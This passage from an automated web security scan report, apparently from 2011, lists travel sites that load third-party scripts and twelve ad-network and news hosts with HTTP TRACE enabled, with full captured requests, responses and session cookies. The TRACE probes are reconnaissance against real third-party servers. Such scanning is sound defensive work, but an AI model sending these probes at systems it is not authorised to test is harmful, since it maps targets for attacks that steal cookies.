Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabretravelnetwork.com/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; exp_last_activity=1317618416; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:06:58 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 03 Feb 2010 21:57:53 GMT
ETag: "ec8c01-b432-4f665a40"
Accept-Ranges: bytes
Content-Length: 46130
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</title>

<script src="http://asset.userfly.com/users/20826/userfly.js" type="text/javascript"></script>
...[SNIP]...
20.114. http://www.travelocity.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/resolve/default
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; TVLY_LOCALE=us

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:03 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 176568
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!-- Vignette V6 Sun Oct 02 19:08:04 2011 -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if IE]><![endif]-->
<html x
...[SNIP]...
<head>

    <script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/js/mbox.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/js/tracking_tags_US.js"></script>
...[SNIP]...
</script> <script language="JavaScript" type="text/javascript" src="http://i.travelpn.com/js/calendar_datepicker.js"></script>
...[SNIP]...
20.115. http://www.travelocity.com/472a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /472a

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /472a HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; TVLY_LOCALE=us; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:06 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 178468
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!-- Vignette V6 Sun Oct 02 19:08:06 2011 -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1
...[SNIP]...
</script>
<script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/js/tracking_tags_US.js"></script>
...[SNIP]...
</script> <script language="JavaScript" type="text/javascript" src="http://i.travelpn.com/js/calendar_datepicker.js"></script>
...[SNIP]...
</script>
   
   <script language="JavaScript" type="text/javascript" src="http://design.dev.sabre.com/htdocs/group/fgaleano/JSONtoXML/jquery.base64.js"></script>
...[SNIP]...
20.116. http://www.travelocity.com/popWindow2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelocity.com
Path:   /popWindow2

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway= HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; TVLY_LOCALE=us; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; popunder=yes; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:50 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9512
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!-- Vignette V6 Sun Oct 02 19:08:50 2011 -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><!-- <logit>|~||DM||||~|</logit> -->


...[SNIP]...
</div>

   <script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/js/mbox.js"></script>
...[SNIP]...
</script>

       <script type="text/javascript" src="http://i.travelpn.com.edgesuite.net/jQuery/1.4.3/jquery-1.4.3.min.js"></script>
...[SNIP]...
20.117. http://www.trip.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trip.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1 HTTP/1.1
Host: www.trip.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:35:01 GMT
Server: Apache/2.2.18 (Unix) DAV/2 mod_jk/1.2.23
Last-Modified: Fri, 23 Sep 2011 00:04:36 GMT
ETag: "ab4c-4ad908dfe6d00"
Accept-Ranges: bytes
ntCoent-Length: 43852
Content-Type: text/html
Cache-Control: private
Content-Length: 43852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Cheap Flights, Hotels &amp; Trips | Trip.com</title>
...[SNIP]...
</script>    
<script type="text/javascript" src="http://media.away.com/trip/tripjs/combined_javascript1-min.js"></script>
<script type="text/javascript" src="http://media.away.com/trip/tripjs/mbox.js"></script>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<!-- end move to compare rates js, replace swapWidgetFormCompareRates -->
   <script type="text/javascript" src="http://media.away.com/trip/tripjs/dcl/provider_data_map-min.js"></script>
...[SNIP]...
</script> -->
   <script language="JavaScript" src="http://media.away.com/trip/tripjs/s_code.js"></script>
   <!-- End SiteCatalyst Code -->
   <script type="text/javascript" src="http://media.away.com/trip/tripjs/jquery/autofill-jquery-min.js"></script>
   <script type="text/javascript" src="http://media.away.com/trip/tripjs/jquery/autofill-helper-min.js"></script>
...[SNIP]...
20.118. http://www.trip.com/box_ad_refresh.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trip.com
Path:   /box_ad_refresh.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /box_ad_refresh.html?type= HTTP/1.1
Host: www.trip.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx.bxbz.dpn.80_dt_efgbvmu=ffffffff09e3442f45525d5f4f58455e445a4a423660; NSC_xxx.bxbz.dpn.80_gxe=ffffffff09e3882b45525d5f4f58455e445a4a423660; __utma=245868737.2049523975.1317602099.1317602099.1317602099.1; __utmb=245868737.2.10.1317602099; __utmc=245868737; __utmz=245868737.1317602099.1.1.utmcsr=orbitz|utmccn=triplooking|utmcmd=crpopunder|utmcct=air; mbox=check#true#1317602160|session#1317602099178-690078#1317603960|PC#1317602099178-690078.19#1318811702; __qca=P0-1307346892-1317602104437; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3D1%3B%20s_sq%3Dobtzawytrip.comprod%253D%252526pid%25253DFlights%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bjavascript%2525253AshowRndTripProviders%25252528%25252527flights%25252527%25252529%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DRADIO%3B

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:35:10 GMT
Server: Apache/2.2.18 (Unix) DAV/2 mod_jk/1.2.23
Last-Modified: Fri, 23 Sep 2011 00:04:36 GMT
ETag: "c42-4ad908dfe6d00"
Accept-Ranges: bytes
Cteonnt-Length: 3138
Content-Type: text/html
Cache-Control: private
Content-Length: 3138

<HTML>
<HEAD>
<script language="JavaScript" src="http://media.away.com/trip/tripjs/dcl/comparerates-min.js" type="text/javascript"></script>
<style>
h6.adlabel {text-align:center;color:#7E7E7E;fon
...[SNIP]...
20.119. http://www.trip.com/hotels.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trip.com
Path:   /hotels.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /hotels.html HTTP/1.1
Host: www.trip.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx.bxbz.dpn.80_dt_efgbvmu=ffffffff09e3442f45525d5f4f58455e445a4a423660; NSC_xxx.bxbz.dpn.80_gxe=ffffffff09e3882b45525d5f4f58455e445a4a423660; __qca=P0-1307346892-1317602104437; geoCountryCode=US; mbox=check#true#1317602171|session#1317602099178-690078#1317603971|PC#1317602099178-690078.19#1318811711; __utma=245868737.2049523975.1317602099.1317602099.1317602099.1; __utmb=245868737.3.10.1317602099; __utmc=245868737; __utmz=245868737.1317602099.1.1.utmcsr=orbitz|utmccn=triplooking|utmcmd=crpopunder|utmcct=air; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3D1%3B%20s_sq%3Dobtzawytrip.comprod%253D%252526pid%25253DFlights%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.trip.com/hotels.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:36:10 GMT
Server: Apache/2.2.18 (Unix) DAV/2 mod_jk/1.2.23
Last-Modified: Fri, 23 Sep 2011 00:04:36 GMT
ETag: "a517-4ad908dfe6d00"
Accept-Ranges: bytes
ntCoent-Length: 42263
Content-Type: text/html
Cache-Control: private
Content-Length: 42263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Discount Hotel Rates & Cheap Trips | Trip.com</title
...[SNIP]...
</script>
<script type="text/javascript" src="http://media.away.com/trip/tripjs/combined_javascript1-min.js"></script>
<script type="text/javascript" src="http://media.away.com/trip/tripjs/mbox.js"></script>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<!-- end move to compare rates js, replace swapWidgetFormCompareRates -->
   <script type="text/javascript" src="http://media.away.com/trip/tripjs/dcl/provider_data_map-min.js"></script>
...[SNIP]...
</script> -->
   <script language="JavaScript" src="http://media.away.com/trip/tripjs/s_code.js"></script>
   <!-- End SiteCatalyst Code -->
   <script type="text/javascript" src="http://media.away.com/trip/tripjs/jquery/autofill-jquery-min.js"></script>
   <script type="text/javascript" src="http://media.away.com/trip/tripjs/jquery/autofill-helper-min.js"></script>
...[SNIP]...
20.120. http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tripadvisor.com
Path:   /SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746; TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; TACds=A.1.11539.1.2011-10-02; TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.1*MC.11893*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.37*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*TRA.true; ServerPool=T; PassThruUrlArgs=%1%a_checkin.10%2F9%2F2011-qbos-a_adults.1-m11893-a_checkout.10%2F16%2F2011; BEPIN=%1%132c736d105%3Bbak14b%3A7724%3B

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:38:20 GMT
Server: Apache
pragma: no-cache
cache-control: no-cache,no-store,must-revalidate
expires: 0
Set-Cookie: TATravelInfo=V2*AC.DFW*A.2*MG.-1*HP.2*FL.3; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 00:38:21 GMT; Path=/
Set-Cookie: TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.58*MC.13091*LS.SmartDeals*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.37*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*CU.USD*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals%5C.html*FS.37*TRA.true*LL.971922*LD.60745*EWS.SmartDeals; Domain=.tripadvisor.com; Path=/
Set-Cookie: ServerPool=T; Domain=.tripadvisor.com; Path=/
Set-Cookie: CM=%1%sh%2C%2C-1%7CWShadeSeen%2C%2C-1%7C; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 00:38:21 GMT; Path=/
Set-Cookie: PassThruUrlArgs=null; Domain=.tripadvisor.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 356474
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="content-type" content="text/html
...[SNIP]...
</script>
<script type='text/javascript' src='http://c1.tacdn.com/js3/tripadvisor-c-v856399127b.js'></script>
...[SNIP]...
</script>
<script type="text/javascript" src='http://c1.tacdn.com/js3/src/ta/servlet/smartdeals-v1425560272b.js'></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://c1.tacdn.com/js/tripcompat.js"></script>
...[SNIP]...
<!-- PRODUCTION -->
<script type="text/javascript" src="http://c1.tacdn.com/js3/src/trsupp-v283141723b.js"></script>
...[SNIP]...
<div class="adServer noFrame dom_en_US">
<script language=Javascript1.1 src="http://ad.doubleclick.net/adj/ta.ta.com.s/na.us.ma.boston;mcid=13091;PageType=SmartDeals;pool=T;geo=60745;u=SmartDeals%7CT;rd=com;abr=!webtv;hcm=false;hname=Boston;gname=Massachusetts;sz=728X90%2C970X66;tile=1;ord=75691953?"></script>
...[SNIP]...
21. TRACE method is enabled  previous  next
There are 12 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

21.1. http://bcp.crwdcntrl.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /

Request

TRACE / HTTP/1.0
Host: bcp.crwdcntrl.net
Cookie: 613e05621c6bbe6b

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:53:09 GMT
Server: Apache/2.2.8 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: bcp.crwdcntrl.net
Cookie: 613e05621c6bbe6b; cc=optout

21.2. http://bh.contextweb.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /

Request

TRACE / HTTP/1.0
Host: bh.contextweb.com
Cookie: d16a502b92872c17

Response

HTTP/1.1 200 OK
Server: GlassFish v3
Content-Type: message/http
Content-Length: 1076
Date: Sun, 02 Oct 2011 23:49:42 GMT

TRACE / HTTP/1.1
host: bh.contextweb.com
cookie: d16a502b92872c17; C2W4=0; FC1-WCR=132981_3_3Ilow^132982_4_3Iloz; V=PpAVCxNh2PJr; cw=cw; cwbh1=357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712
...[SNIP]...
21.3. http://cacheserve.williamhill.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cacheserve.williamhill.com
Path:   /

Request

TRACE / HTTP/1.0
Host: cacheserve.williamhill.com
Cookie: 4455a01a06e70c89

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:52:20 GMT
Server: MII-APC/2.1.10
P3P: CP="NON DEVa TAIa OUR BUS"
Content-Type: message/http
Content-Length: 319
Via: 1.1 sjc005158 (MII-APC/2.1)
Expires: Sun, 09 Oct 2011 23:52:20 GMT
Cache-Control: max-age=604800
X-Pb-Mii: Powered by Mirror Image Internet
Via: 1.1 sjc005092 (MII-APC/2.1)
Connection: close

TRACE / HTTP/1.1
host: serve.williamhill.com
cookie: 4455a01a06e70c89
via: 1.0 sjc005092 (MII-APC/2.1)
x-forwarded-for: 50.23.123.106, 10.172.105.2
x-mii-max-forwards: 4
x-mii-transaction-id: wap2.sjc-26403.0000000326-1317599539-0030473588
x-mii-request-host: cache
...[SNIP]...
21.4. http://d.tradex.openx.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /

Request

TRACE / HTTP/1.0
Host: d.tradex.openx.com
Cookie: 1c42f8d3a07893f9

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:52:00 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: d.tradex.openx.com
Cookie: 1c42f8d3a07893f9; OAID=6f699005174db05207a17138d8473dc0; OXRB=28_4196; __utma=20948333.858847159.1317599444.1317599444.1317599444.1; __utmb=20948333.6.6.1317599444; __utmc=20948333; __utmz=20948333.1317599444.1.1.utmc
...[SNIP]...
21.5. http://event.publishflow.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://event.publishflow.com
Path:   /

Request

TRACE / HTTP/1.0
Host: event.publishflow.com
Cookie: ba7bc8b4ce090b8b

Response

HTTP/1.1 200 OK
Content-Type: message/http
Date: Sun, 02 Oct 2011 23:51:35 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.5 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8g
Content-Length: 323
Connection: Close

TRACE / HTTP/1.1
host: event.publishflow.com
Cookie: ba7bc8b4ce090b8b; AWSELB=974B0DDE6F27F729ADA14C0EB858EF620F7B00166FC4DA806180BED4EB66F98EC8584227F6B500BE28E2327CEF7D510565EB6A8C2B8313CC4B55BD60C1425C39616D3EB3
X-Forwarded-For: 50.23.123.106
X-Forwarded-Port: 80

...[SNIP]...
21.6. http://m.xp1.ru4.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.xp1.ru4.com
Path:   /

Request

TRACE / HTTP/1.0
Host: m.xp1.ru4.com
Cookie: a57da61faf1d523d

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:50:18 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: message/http
Connection: close

TRACE / HTTP/1.0
Host: m.xp1.ru4.com
Cookie: a57da61faf1d523d; X1ID=OO-00000000000000000; 31041217-B31041253=2|31041263|0|0|0|31041234|31041231|-1; 66281-B66290=3|0|0|0|0|66286|110253|-1
Connection: Keep-Alive
X-xp1-forwarded-for: 50.23.123.106

21.7. http://matcher-cwb.bidder7.mookie1.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://matcher-cwb.bidder7.mookie1.com
Path:   /

Request

TRACE / HTTP/1.0
Host: matcher-cwb.bidder7.mookie1.com
Cookie: b74d61cdd8b81312

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:50:15 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: matcher-cwb.bidder7.mookie1.com
Cookie: b74d61cdd8b81312; optouts=cookies; RMOPTOUT=3; id=; mdata=
Connection: Keep-Alive
MIG_IP: 50.23.123.106

21.8. http://optimized-by.rubiconproject.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /

Request

TRACE / HTTP/1.0
Host: optimized-by.rubiconproject.com
Cookie: b35c937d4055a2c5

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:48:53 GMT
Server: RAS/1.3 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: b35c937d4055a2c5; put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSA
...[SNIP]...
21.9. http://r.openx.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /

Request

TRACE / HTTP/1.0
Host: r.openx.net
Cookie: 500463f5191b7ca

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:52:32 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: r.openx.net
Cookie: 500463f5191b7ca; i=d2a43928-76cd-49ea-b899-b41fb371435f; s=ba6bf0b1-8895-45a9-97a1-53f788c412d7; p=1317599547
X-Forwarded-For: 50.23.123.106

21.10. http://tap.rubiconproject.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /

Request

TRACE / HTTP/1.0
Host: tap.rubiconproject.com
Cookie: da389861817d4db4

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:41 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: tap.rubiconproject.com
Cookie: da389861817d4db4; SERVERID=; dq=7|7|0|0; put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7
...[SNIP]...
21.11. http://www.guardian.co.uk/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /

Request

TRACE / HTTP/1.0
Host: www.guardian.co.uk
Cookie: c489d5d97860d710

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:50:54 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.guardian.co.uk
Cookie: c489d5d97860d710; GU_LOCATION=dXNhOjU6dnQ6NTpzdG93ZTo1OjUyMzpicm9hZGJhbmQ6IDQ0LjUwMDotNzIuNjQ2QDg2MjQxMTYzMTY1MzMyMzU2NTEwMjIxMTk2MjQ0MjAyMTgxNzExNjk3; s_pers=%20s_lv%3D1317599402360%7C1412207402360%3B%20s_lv_s%3DFirs
...[SNIP]...
21.12. http://www.luminate.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.luminate.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.luminate.com
Cookie: 5fe1f88139b02ae6

Response

HTTP/1.0 200 OK
Date: Sun, 02 Oct 2011 23:52:36 GMT
Server: Apache
Content-Type: message/http
X-Cache: MISS from lb3-sv.int.pixazza.com
X-Cache-Lookup: NONE from lb3-sv.int.pixazza.com:80
Via: 1.0 lb3-sv.int.pixazza.com:80 (squid/2.6.STABLE18)
Connection: Keep-Alive

TRACE / HTTP/1.0
Host: www.luminate.com
Cookie: 5fe1f88139b02ae6; shoptube_id=f6d10bcb0c; referrer_53d1ac1014=
Via: 1.0 lb3-sv.int.pixazza.com:80 (squid/2.6.STABLE18)
X-Forwarded-For: 50.23.123.106, 10.111.2.6
Cache-Control: max-age=259200

22. Email addresses disclosed  previous  next
There are 47 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

